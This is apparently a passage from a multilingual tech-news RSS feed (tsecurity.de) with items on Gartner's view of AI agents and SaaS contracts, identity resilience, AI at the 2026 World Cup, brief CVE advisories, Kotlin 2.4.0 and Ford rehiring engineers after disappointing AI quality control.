<p>“Lo realmente importante es determinar si un agente puede hacer todo —e incluso más— a través de la API de un sistema que lo que una persona puede realizar mediante una interfaz gráfica, y si las condiciones del proveedor lo permiten”, afirma Brocklehurst.</p>



<p>Este cambio también afecta a la forma de evaluar los contratos de software. “Examine el contrato con la misma atención con la que examina la tecnología”, recomienda. “Las condiciones de los proveedores pueden prohibir o restringir —desde el punto de vista técnico o financiero— el uso autónomo por parte de terceros. Los CIO podrían descubrir que su estrategia de IA está bloqueada no por una limitación tecnológica, sino por cláusulas que ya firmaron”.</p>



<p>Por ello, aconseja que las organizaciones negocien desde ahora los permisos para el uso de agentes en sus acuerdos de software, ya que muchos contratos seguirán vigentes cuando los agentes de IA se generalicen.</p>



<h2 class="wp-block-heading">La propiedad del conocimiento será el próximo campo de batalla</h2>



<p>Más allá de las API y las licencias, las empresas deberán prestar especial atención a dónde se almacena el conocimiento generado por los sistemas de IA. Cada corrección, excepción o flujo de trabajo gestionado por un agente crea conocimiento organizativo. Gartner denomina Knowledge Retention Rate (KRR) o tasa de retención del conocimiento a la capacidad de una organización para conservar ese aprendizaje.</p>



<p>“Si ese conocimiento acaba alimentando los modelos compartidos del proveedor, la experiencia operativa de su empresa estará mejorando un producto que también utilizan sus competidores”, señala Brocklehurst. “La cláusula más importante de la próxima generación de contratos de software será: “¿Quién es el propietario de lo que el sistema aprende de usted?””.</p>



<p>Según Gartner, las empresas corren el riesgo de caer en una nueva forma de dependencia tecnológica (vendor lock-in) si ese aprendizaje operativo permanece en manos de los proveedores y no de los clientes.</p>



<h2 class="wp-block-heading">El modelo económico tradicional del SaaS afronta una disrupción</h2>



<p>Gartner sostiene que los agentes de IA capaces de ejecutar procesos en múltiples aplicaciones empresariales reducirán la interacción directa de los usuarios con las interfaces tradicionales, debilitando el vínculo histórico entre el uso del software y las licencias basadas en número de usuarios.</p>



<p>Ante este escenario, los proveedores consolidados deberán evolucionar desde una propuesta de valor centrada en la interfaz hacia otra basada en los resultados, incorporando capacidades agentivas directamente en los procesos de negocio y preservando el conocimiento específico de cada cliente.</p>



<p>Al mismo tiempo, las <em>startups </em>nativas de IA y los proveedores de servicios podrían beneficiarse al convertirse en la capa de orquestación encargada de coordinar el trabajo entre múltiples aplicaciones empresariales. “Aunque este cambio supone una amenaza existencial para los proveedores que siguen defendiendo modelos basados en paneles de control tradicionales y licencias por usuario, también crea una importante oportunidad de ingresos para quienes desarrollen servicios y plataformas capaces de soportar flujos de trabajo transversales impulsados por agentes”, indica Brocklehurst.</p>



<h2 class="wp-block-heading">La gobernanza debe evolucionar junto con los sistemas autónomos</h2>



<p>Gartner también insta a los CIO a establecer marcos de gobernanza antes de que los agentes autónomos de IA se conviertan en algo habitual. “No conceda autonomía de forma implícita ni desigual”, advierte Brocklehurst. Las organizaciones deben tratar la autonomía de los agentes como una decisión explícita de gobierno corporativo, definiendo dónde pueden actuar de forma independiente, quién autoriza esas decisiones y con qué frecuencia deben revisarse esos permisos.</p>



<p>“Las empresas que desarrollen esa capacidad desde ahora podrán avanzar más rápido y con mayor seguridad cuando la tecnología esté preparada para asumir más responsabilidades”, concluye.</p>



<p>Aunque Gartner describe esta transición como una redefinición del concepto de ‘Saaspocalypse’, Brocklehurst subraya que el SaaS no desaparecerá. “Esto es menos un apocalipsis y más una metamorfosis. El SaaS no será destruido; simplemente emergerá bajo una forma diferente”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[La resiliencia de identidad empieza donde termina el ‘backup’ ]]></title>
<description><![CDATA[La identidad se ha convertido en el nuevo perímetro corporativo. En un entorno dominado por modelos híbridos, servicios en la nube y arquitecturas zero trust, prácticamente todas las operaciones dependen de mecanismos de autenticación y autorización. Cuando estos sistemas dejan de funcionar, el i...]]></description>
<link>https://tsecurity.de/de/3640399/it-security-nachrichten/la-resiliencia-de-identidad-empieza-donde-terminaelbackup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640399/it-security-nachrichten/la-resiliencia-de-identidad-empieza-donde-terminaelbackup/</guid>
<pubDate>Thu, 02 Jul 2026 09:22:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La identidad se ha convertido en el nuevo perímetro corporativo. En un entorno dominado por modelos híbridos, servicios en la nube y arquitecturas <em>zero trust</em>, prácticamente todas las operaciones dependen de mecanismos de autenticación y autorización. Cuando estos sistemas dejan de funcionar, el impacto va mucho más allá de una interrupción tecnológica: se paralizan procesos de negocio, se bloquea el acceso a aplicaciones críticas y la capacidad operativa de la organización se reduce drásticamente. </p>



<p>Esta realidad ha elevado la importancia de conceptos como la resiliencia de identidad, una disciplina que va más allá de la protección preventiva para centrarse en la capacidad de recuperación tras un incidente. Porque la pregunta ya no es únicamente cómo evitar una intrusión, sino cómo volver a operar cuando los mecanismos de identidad han sido comprometidos. </p>



<p>El problema es que muchas organizaciones siguen abordando esta cuestión desde una perspectiva heredada. Se asume que recuperar un sistema de identidad es equivalente a restaurar un servidor, una base de datos o una aplicación empresarial. Pero no es así. Plataformas como Active Directory, que continúan siendo el núcleo de la identidad en una gran parte de las empresas del mundo, presentan una complejidad técnica singular. Su naturaleza distribuida, los procesos de replicación y las múltiples dependencias con otros sistemas hacen que una recuperación completa requiera procedimientos específicos, conocimiento especializado y una planificación rigurosa. </p>



<p>Esta diferencia es especialmente relevante en el contexto actual de las amenazas. Los atacantes ya no buscan únicamente cifrar sistemas o exfiltrar información. Cada vez con más frecuencia intentan comprometer la infraestructura de identidad para obtener persistencia, escalar privilegios y dificultar la recuperación posterior. En muchos casos, incluso después de restaurar los sistemas afectados, los mecanismos de acceso maliciosos permanecen ocultos dentro del entorno de identidad, permitiendo que el atacante vuelva a tomar el control. </p>



<p>Por ello, medir la preparación únicamente en términos de <em>backup</em> resulta insuficiente. Una estrategia madura debe centrarse en la recuperación efectiva. Esto implica validar periódicamente los procedimientos, definir objetivos de recuperación realistas y comprobar que la organización puede restaurar no solo la tecnología, sino también la capacidad mínima necesaria para mantener la actividad empresarial. </p>



<figure class="wp-block-pullquote"><blockquote><p><strong><em>Una estrategia madura debe centrarse en la recuperación efectiva</em></strong></p></blockquote></figure>



<p>Aquí surge una cuestión que con frecuencia pasa desapercibida: ¿qué significa realmente recuperarse? Muchas métricas tradicionales se centran en volver a poner en marcha un controlador de dominio o restaurar una instancia concreta. Sin embargo, desde la perspectiva del negocio, la recuperación solo puede considerarse completa cuando los procesos críticos vuelven a estar operativos. En otras palabras, el tiempo de recuperación debe medirse en función de la capacidad de la empresa para funcionar, no únicamente de la disponibilidad técnica de determinados componentes. </p>



<p>La experiencia demuestra que las organizaciones más preparadas son aquellas que someten sus planes a pruebas continuas. Del mismo modo que se realizan simulacros de evacuación ante emergencias físicas, los ejercicios de recuperación de identidad permiten identificar dependencias ocultas, validar tiempos de respuesta y detectar fallos antes de que una crisis real los convierta en un problema crítico. La resiliencia no puede darse por supuesta; debe demostrarse. </p>



<p>Además, la recuperación moderna exige una visión ciberresiliente. Restaurar un entorno comprometido sin comprender cómo fue atacado supone correr el riesgo de reintroducir el problema. Las organizaciones necesitan ser capaces de identificar indicadores de persistencia, detectar configuraciones manipuladas y garantizar que los sistemas recuperados son realmente confiables. Recuperar rápido es importante, pero recuperar de forma segura lo es aún más. </p>



<p>En última instancia, la resiliencia de identidad representa un cambio de paradigma para los responsables de seguridad y de infraestructura. Durante años, el objetivo fue impedir cualquier intrusión. Hoy sabemos que ninguna organización puede garantizar una protección absoluta. Lo que diferencia a las empresas más resilientes no es la ausencia de incidentes, sino su capacidad para restaurar rápidamente la confianza en sus sistemas críticos cuando estos se ven comprometidos. </p>



<p>En un escenario donde la identidad sustenta prácticamente todas las operaciones digitales, la capacidad de recuperación deja de ser una cuestión técnica para convertirse en un factor estratégico de supervivencia empresarial. Y esa capacidad empieza mucho antes de una crisis, cuando las organizaciones dejan de preguntarse si tienen copias de seguridad y comienzan a preguntarse si realmente están preparadas para recuperar su identidad. </p>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Darren-Mar-Elia-SEMPERIS-1.jpg?quality=50&amp;strip=all" alt="Darren Mar-Elia es el Principal Security Strategist (Estratega Principal de Seguridad) de Semperis" class="wp-image-4192058 size-full" loading="lazy" width="400px"></figure><div class="wp-block-media-text__content">
<p><strong><em>El autor de este artículo es <a href="https://www.linkedin.com/in/gpoguy" target="_blank" rel="nofollow">Darren Mar-Elia</a>, estratega principal de seguridad de Semperis, empresa especializada en protección y recuperación de Active Directory y sistemas de identidad en la nube. Con una trayectoria de más de 20 años en TI corporativa y 10 en software empresarial, es un experto reconocido en la gestión de configuraciones, infraestructura de Microsoft y ciberseguridad.</em></strong></p>
</div></div>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[La IA salta al terreno de juego en el Mundial]]></title>
<description><![CDATA[La Copa Mundial de la FIFA es, posiblemente, la mayor oportunidad publicitaria jamás concebida. Al menos 2.800 millones de personas vieron alguna parte del Mundial de Catar 2022. Y este año se espera que esa cifra alcance al menos los 6.000 millones. Sin embargo, estos números palidecen frente a ...]]></description>
<link>https://tsecurity.de/de/3640310/it-nachrichten/la-ia-salta-al-terreno-de-juego-en-el-mundial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640310/it-nachrichten/la-ia-salta-al-terreno-de-juego-en-el-mundial/</guid>
<pubDate>Thu, 02 Jul 2026 08:17:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>La Copa Mundial de la FIFA es, posiblemente, la mayor oportunidad publicitaria jamás concebida. Al menos 2.800 millones de personas vieron alguna parte del Mundial de Catar 2022. Y este año se espera que esa cifra alcance al menos los 6.000 millones. Sin embargo, estos números palidecen frente a la enorme cantidad de dinero invertida en campañas de marketing por algunas de las mayores empresas del mundo, que buscan promocionar desde refrescos y ropa deportiva hasta automóviles y ordenadores.</p>



<p>Los mayores innovadores en inteligencia artificial también forman parte de esta competición publicitaria, aunque en lugar de exhibir el poder de sus grandes modelos de lenguaje (LLM), dos de los mayores contribuyentes al gasto publicitario del Mundial, OpenAI y Google, parecen conformarse con recordar al público que existen. Para el creador de ChatGPT, eso significa pagar al delantero argentino Lionel Messi para que pida al <em>chatbot </em>que tiña virtualmente su cabello con los colores de la bandera de su país. Gemini, por su parte, se ha limitado a patrocinar a la selección argentina y a ajustar su modelo para responder a preguntas sobre los partidos como lo haría un aficionado.</p>



<p>Este nivel de implicación es comprensible en el caso de Google, cuyas aplicaciones Maps y Translate, potenciadas por IA, ya aportan un valor incalculable a los aficionados que visitan lugares desconocidos o intentan comunicarse en idiomas que no dominan. Otras compañías, sin embargo, tienen planes más sofisticados.</p>



<h2 class="wp-block-heading">Entre bastidores</h2>



<p>Lenovo, por ejemplo, ha lanzado Football AI Pro, una aplicación diseñada para procesar millones de datos generados durante los partidos y convertirlos en más de 2.000 métricas que ayudan a las selecciones nacionales a planificar estrategias para sus próximos encuentros. A partir de esos datos, los agentes de IA de la plataforma pueden generar respuestas en lenguaje natural, representaciones gráficas y simulaciones animadas de diferentes escenarios. “Los equipos pueden incluso reproducir acciones y analizar la toma de decisiones tácticas de partidos anteriores”, explica Art Hu, CIO global de Lenovo.</p>



<p>Las conversaciones con FIFA sobre este proyecto comenzaron en 2022. Para entonces, Lenovo ya contaba con una sólida experiencia en colaboraciones deportivas gracias a acuerdos con la Fórmula 1, Ducati y los Carolina Hurricanes. En el caso de la FIFA, la idea surgió como una plataforma de software capaz de proporcionar análisis estadístico e información estratégica basada en IA a las 48 selecciones participantes. Según Hu, pocos deportes ofrecen un acceso tan avanzado a este tipo de tecnología.</p>



<p>Los árbitros también están beneficiándose de estas herramientas. Lenovo ha creado reconstrucciones tridimensionales impulsadas por IA de más de 1.200 jugadores participantes en el torneo. Estas recreaciones permiten a los colegiados tomar mejores decisiones cuando su visión, o incluso la de las cámaras VAR, queda obstaculizada. “Estos avatares proporcionan un mayor contexto y comprensión en los momentos decisivos”, afirma Hu. “Ya los hemos visto utilizarse de forma efectiva en repeticiones relacionadas con fueras de juego durante el torneo”.</p>



<p>A medida que concluyan las fases de grupos y el campeonato llegue a su fin, FIFA publicará más información sobre el uso de estas herramientas. Por ello, Hu no puede detallar todavía cómo Football AI Pro está ayudando exactamente a cada selección. Sin embargo, considera que la plataforma tiene potencial más allá del fútbol. “Como Football AI Pro se ha desarrollado, en parte, utilizando Lenovo AI Factory, gran parte de la infraestructura subyacente puede reutilizarse en otras soluciones que requieran motores de IA personalizados y multiagente”.</p>



<h2 class="wp-block-heading">Control de multitudes</h2>



<p>Más allá del césped y de las gradas, la inteligencia artificial también está desempeñando una función crucial en materia de seguridad. Se espera que alrededor de cinco millones de aficionados viajen a las ciudades anfitrionas de Estados Unidos, México y Canadá para apoyar a sus selecciones, lo que supone una importante presión adicional para los servicios de emergencia locales. A menudo, cuando se produce una situación de estrés, los turistas recurren instintivamente a su lengua materna.</p>



<p>Es aquí donde entra en juego RapidSOS. La compañía proporciona a los servicios de emergencia de Estados Unidos, Canadá y México herramientas para obtener información contextual crítica de los llamantes, como su ubicación exacta. Además, emplea IA para identificar automáticamente los detalles más relevantes de cada incidente y compartirlos con los actores implicados.</p>



<p>Dada la magnitud del evento, esto significa mantener informados no solo a los equipos de emergencias, sino también a la FIFA, a los operadores de los estadios y a cualquier organización que tenga contacto directo con los aficionados.</p>



<p>Una de las funciones más relevantes del sistema es su capacidad para traducir hasta 50 idiomas en tiempo real a partir del audio de las llamadas, algo especialmente útil durante los días de partido. El servicio también resulta eficaz cuando la comunicación es deficiente debido al ruido ambiental, una situación frecuente en recintos deportivos abarrotados. “Disponemos de una enorme cantidad de datos sintéticos basados en llamadas reales que utilizamos constantemente para poner a prueba nuestros sistemas”, explica Zach LaValley, director de tecnología de RapidSOS.</p>



<p>Según el directivo, el sistema puede incluso priorizar determinados modelos de traducción o transcripción en función de los idiomas predominantes de cada localidad. LaValley subraya que la tecnología de RapidSOS no sustituye a otros servicios de atención disponibles para los aficionados, pero sí ofrece una alternativa rápida y funcional cuando encontrar a una persona que hable el idioma adecuado puede requerir varios minutos.</p>



<p>En un evento global donde la velocidad puede marcar la diferencia tanto dentro como fuera del terreno de juego, la inteligencia artificial se está consolidando como una herramienta decisiva para mejorar el rendimiento deportivo, reforzar la toma de decisiones y garantizar la seguridad de millones de personas.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-33701 | open-telemetry opentelemetry-java-instrumentation up to 2.26.0 System Property deserialization (GHSA-xw7x-h9fj-p2c7)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in open-telemetry opentelemetry-java-instrumentation up to 2.26.0. Affected is an unknown function of the component System Property Handler. Such manipulation leads to deserialization.

This vulnerability is uniquely identified as CVE-2026...]]></description>
<link>https://tsecurity.de/de/3639806/sicherheitsluecken/cve-2026-33701-open-telemetry-opentelemetry-java-instrumentation-up-to-2260-system-property-deserialization-ghsa-xw7x-h9fj-p2c7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639806/sicherheitsluecken/cve-2026-33701-open-telemetry-opentelemetry-java-instrumentation-up-to-2260-system-property-deserialization-ghsa-xw7x-h9fj-p2c7/</guid>
<pubDate>Wed, 01 Jul 2026 23:54:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/open-telemetry:opentelemetry-java-instrumentation">open-telemetry opentelemetry-java-instrumentation up to 2.26.0</a>. Affected is an unknown function of the component <em>System Property Handler</em>. Such manipulation leads to deserialization.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-33701">CVE-2026-33701</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39419 | Oracle Database 19c/21c Java VM information disclosure (EUVD-2022-41864)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Oracle Database 19c/21c. Impacted is an unknown function of the component Java VM. Such manipulation leads to information disclosure.

This vulnerability is referenced as CVE-2022-39419. It is possible to launch the attack remotely. No ...]]></description>
<link>https://tsecurity.de/de/3639561/sicherheitsluecken/cve-2022-39419-oracle-database-19c21c-java-vm-information-disclosure-euvd-2022-41864/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639561/sicherheitsluecken/cve-2022-39419-oracle-database-19c21c-java-vm-information-disclosure-euvd-2022-41864/</guid>
<pubDate>Wed, 01 Jul 2026 21:53:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/oracle:database">Oracle Database 19c/21c</a>. Impacted is an unknown function of the component <em>Java VM</em>. Such manipulation leads to information disclosure.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2022-39419">CVE-2022-39419</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding ist keine gute Idee bei Java]]></title>
<description><![CDATA[Vibe Coding versprach die Demokratisierung der Softwareentwicklung. Für Prototypen mag das stimmen. Für Java-Systeme, die Banken, Krankenhäuser oder Behörden am Laufen halten, gilt das nicht. IT-Entscheider müssen das Fundament ihrer Unternehmens-IT schützen.

Tags: #JAVA | #Programmieren | #Vibe...]]></description>
<link>https://tsecurity.de/de/3638606/it-security-nachrichten/vibe-coding-ist-keine-gute-idee-bei-java/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638606/it-security-nachrichten/vibe-coding-ist-keine-gute-idee-bei-java/</guid>
<pubDate>Wed, 01 Jul 2026 15:07:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920.png" class="attachment-full size-full wp-post-image" alt="Programmieren" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920.png 1920w, https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920-300x169.png 300w, https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920-1024x576.png 1024w, https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920-768x432.png 768w, https://www.it-daily.net/wp-content/uploads/2025/09/Programmieren-Haende-Shutterstock-2639261173-1920-1536x864.png 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Vibe-Coding ist keine gute Idee bei Java 1"></p>
    Vibe Coding versprach die Demokratisierung der Softwareentwicklung. Für Prototypen mag das stimmen. Für Java-Systeme, die Banken, Krankenhäuser oder Behörden am Laufen halten, gilt das nicht. IT-Entscheider müssen das Fundament ihrer Unternehmens-IT schützen.

<p>Tags: <a href="https://www.it-daily.net/thema/java">#JAVA</a> | <a href="https://www.it-daily.net/thema/programmieren">#Programmieren</a> | <a href="https://www.it-daily.net/thema/vibe-coding">#Vibe Coding</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-46771 | Oracle Application Development Framework 12.2.1.4.0/14.1.2.0.0 Java Business Objects improper authorization (Nessus ID 323928)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Application Development Framework 12.2.1.4.0/14.1.2.0.0. It has been declared as critical. Impacted is an unknown function of the component Java Business Objects. The manipulation results in improper authorization.

This vulnerability is identified as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3637800/sicherheitsluecken/cve-2026-46771-oracle-application-development-framework-122140141200-java-business-objects-improper-authorization-nessus-id-323928/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637800/sicherheitsluecken/cve-2026-46771-oracle-application-development-framework-122140141200-java-business-objects-improper-authorization-nessus-id-323928/</guid>
<pubDate>Wed, 01 Jul 2026 10:09:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:application_development_framework">Oracle Application Development Framework 12.2.1.4.0/14.1.2.0.0</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>Java Business Objects</em>. The manipulation results in improper authorization.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-46771">CVE-2026-46771</a>. The attack is only possible with local access. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nika: Open-source code analysis tool]]></title>
<description><![CDATA[Many serious security bugs in web applications sit across several files at once. Request data enters through a controller, moves through data objects and service layers, and turns dangerous only when it reaches a sensitive operation such as a database query or a file action. A scanner that reads ...]]></description>
<link>https://tsecurity.de/de/3637546/it-security-nachrichten/nika-open-source-code-analysis-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637546/it-security-nachrichten/nika-open-source-code-analysis-tool/</guid>
<pubDate>Wed, 01 Jul 2026 08:07:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Many serious security bugs in web applications sit across several files at once. Request data enters through a controller, moves through data objects and service layers, and turns dangerous only when it reaches a sensitive operation such as a database query or a file action. A scanner that reads one file at a time can miss that path entirely. Nika, an open-source tool from the payments company PhonePe, works on that problem for Java microservices. … <a href="https://www.helpnetsecurity.com/2026/07/01/nika-open-source-code-analysis-tool/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/01/nika-open-source-code-analysis-tool/">Nika: Open-source code analysis tool</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[No more Java refills for Intel Macs after JDK 27, says Oracle]]></title>
<description><![CDATA[Apple's final break with Chipzilla leaves another platform preparing to wind down support]]></description>
<link>https://tsecurity.de/de/3635126/it-nachrichten/no-more-java-refills-for-intel-macs-after-jdk-27-says-oracle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635126/it-nachrichten/no-more-java-refills-for-intel-macs-after-jdk-27-says-oracle/</guid>
<pubDate>Tue, 30 Jun 2026 12:02:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's final break with Chipzilla leaves another platform preparing to wind down support]]></content:encoded>
</item>
<item>
<title><![CDATA[Kotlin improves compile-time constants]]></title>
<description><![CDATA[Kotlin 2.4.0, an update to JetBrains’s statically typed language for building JVM, native, Wasm, and web applications, introduces experimental improvements to compile-time constants, making support for numeric and string types more consistent and easier to use, JetBrains said. 



Kotlin 2.4.0 wa...]]></description>
<link>https://tsecurity.de/de/3635034/ai-nachrichten/kotlin-improves-compile-time-constants/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635034/ai-nachrichten/kotlin-improves-compile-time-constants/</guid>
<pubDate>Tue, 30 Jun 2026 11:18:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Kotlin 2.4.0, an update to JetBrains’s statically typed language for building JVM, native, Wasm, and web applications, introduces experimental improvements to compile-time constants, making support for numeric and string types more consistent and easier to use, JetBrains said. </p>



<p>Kotlin 2.4.0 was released <a href="https://blog.jetbrains.com/kotlin/2026/06/kotlin-2-4-0-released/">June 3</a>. Its experimental improvements to compile-time constants include support for unsigned type operations; standard library functions for strings, such as the <code>.lowercase()</code>, <code>.uppercase()</code>, and <code>.trim()</code> functions, and evaluation of the <code>.name</code> property of <a href="https://kotlinlang.org/docs/enum-classes.html?_gl=1%2Afehijk%2A_gcl_au%2AMTU3MDQ4ODM0NC4xNzgyNTgwMDg4LjEwMzg2MDE2MzkuMTc4Mjc0OTgwNC4xNzgyNzQ5ODA0%2AFPAU%2AMTc4NTM0NDYwNC4xNzgyNTA0Mzkw%2A_ga%2AMTM5MjU2NDU3OS4xNzgyNTgwMDg4%2A_ga_9J976DJZ68%2AczE3ODI3NDgzODQkbzMkZzEkdDE3ODI3NTEyMTIkajU5JGwwJGgw&amp;_cl=MTsxOzE7aVFoRlVMeXhISDhwV2l2d3lVNmhTMDdKMGdPQzVoMnZBcHI2bWpERjNhRkY5eGpWSWY0bjRNVEJwYzNmdnR1aTs%3D#working-with-enum-constants">enum constants</a> and the <a href="https://kotlinlang.org/api/core/kotlin-stdlib/kotlin.reflect/-k-callable/"><code>KCallable</code> interface</a>. To make it clear which functions are evaluated at compile time, Kotlin 2.4.0 introduces the <code>IntrinsicConstEvaluation</code><strong> </strong>annotation. </p>



<p>JetBrains warned that some functions are evaluated at compile time but do not have the annotation yet. Later releases will add the annotation to the remaining functions.</p>



<p>Also in Kotlin 2.4.0:</p>



<ul class="wp-block-list">
<li>Kotlin 2.4.0 improves export to <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a> and <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript,</a> including support for exporting value classes, interfaces, and type variance, as well as ES2015 features when inlining JavaScript code.</li>



<li>The Kotlin compiler can generate classes containing <a href="https://www.infoworld.com/article/4168040/whats-new-and-exciting-in-jdk-26.html">Java 26</a> bytecode.</li>



<li>Experimental support is highlighted for the <a href="https://component-model.bytecodealliance.org/">WebAssembly Component Model</a>. The proposal defines a way to build components from Wasm modules through standardized interfaces and types. This approach helps Wasm evolve from a low-level binary instruction format into a system for composing reusable, language-agnostic components.</li>



<li>Kotlin 2.4.0 has been included in the <a href="https://www.jetbrains.com/idea/download/?_cl=MTsxOzE7RVVQYngzTmMwUzNLNmkzTllYbXBVM20xRnFMcG5rdmE5SkxUYmk0emIycXh6Vjg1NThFa2dlZUlNVkdKeGRFZTs%3D&amp;section=mac">IntelliJ IDEA</a> and <a href="https://developer.android.com/studio">Android Studio</a> IDEs. </li>
</ul>



<p>An update to Kotlin 2.4.0 will arrive soon. Beta1 of <a href="https://kotlinlang.org/docs/whatsnew-eap.html">Kotlin 2.4.20</a> was released on June 24, adding the <code>StackTraceRecoverable</code> interface to the standard library. This interface improves integration with the <code>kotlinx.coroutines</code> library because it lets users define how to create exception instances for stack trace recovery without adding a dependency on<code>kotlinx.coroutines</code>, according to JetBrains. </p>



<p>A build tools API in the Kotlin 2.4.20 beta adds support for the Kotlin/JS, Kotlin/Wasm, and Kotlin metadata targets.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ford vuelve a contratar a 350 antiguos trabajadores decepcionada con la IA]]></title>
<description><![CDATA[Ford ha vuelto a contratar aproximadamente a 350 ingenieros con experiencia después de que la inversión de la compañía en IA y sistemas automatizados de control de calidad no cumpliera las expectativas, tal y como ha informado Bloomberg. En resumen, la tecnología no detectó suficientes problemas....]]></description>
<link>https://tsecurity.de/de/3635002/it-security-nachrichten/ford-vuelve-a-contratar-a-350-antiguos-trabajadores-decepcionada-con-la-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635002/it-security-nachrichten/ford-vuelve-a-contratar-a-350-antiguos-trabajadores-decepcionada-con-la-ia/</guid>
<pubDate>Tue, 30 Jun 2026 11:05:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ford ha vuelto a contratar aproximadamente a 350 ingenieros con experiencia después de que la inversión de la compañía en IA y sistemas automatizados de control de calidad no cumpliera las expectativas, tal y como ha informado Bloomberg. En resumen, la tecnología no detectó suficientes problemas.</p>



<p>“Creímos erróneamente que podíamos crear un producto de alta calidad simplemente introduciendo inteligencia artificial e incorporando nuestros requisitos de diseño”, explicó a Bloomberg Charles Poon, responsable de desarrollo de hardware de Ford.</p>



<p>Los inspectores de calidad contratados de nuevo, conocidos internamente como ingenieros de “barba gris” por su experiencia y años en la compañía, están ahora trabajando para identificar defectos antes de que los componentes lleguen a las fábricas.<br>Aun así, Ford no está abandonando por completo la IA; a los ingenieros con experiencia se les pedirá que ayuden a formar a empleados más jóvenes y a mejorar las herramientas de IA de la empresa.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cómo las empresas compiten por resolver el problema de los ‘tokens’ de IA]]></title>
